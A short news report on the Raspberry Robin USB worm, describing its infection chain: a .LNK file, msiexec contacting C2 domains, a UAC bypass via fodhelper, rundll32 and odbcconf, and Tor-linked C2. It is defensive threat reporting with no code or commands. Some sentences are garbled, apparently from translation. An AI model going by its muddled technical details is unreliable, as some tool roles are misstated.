Cybersecurity researchers have discovered a new malware program with worm-like capabilities that is distributed via removable USB devices.
Attribution of the malware to a cluster called “Raspberry Robin”, Red Canary researchers noted that the worm “uses the Windows installer to access QNAP-related domains and load malicious DLLs.”
It is said that the earliest signs of activity date back to September 2021, when the infection was observed in organizations related to the technology and manufacturing sectors.
Attack chains related to the Raspberry Robin begin by connecting an infected USB flash drive to a Windows machine. The device has a payload of the worm, which appears as a .LNK shortcut file for the legitimate folder.
The worm then takes care of creating a new process using cmd.exe to read and execute the malicious file stored on the external drive.
This is followed by running explorer.exe and msiexec.exe, the latter of which is used for external network communication with the illegal domain for command and control purposes (C2), as well as for downloading and installing the DLL library file.
The malicious DLL is then downloaded and executed using a chain of legitimate Windows utilities such as fodhelper.exe, rundll32.exe for rundll32.exe and odbcconf.exe, efficiently bypassing the control of user accounts (UAC).
Also common to Raspberry Robin detections is the presence of a C2 output contact involving the regsvr32.exe, rundll32.exe, and dllhost.exe processes to IP addresses associated with Tor nodes.
However, at this stage the tasks of the operators remain unanswered. It is also unclear how and where the external drives are infected, although there are suspicions that this is done offline.
“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said. “One of the hypotheses is that this may be an attempt to establish resilience in an infected system.”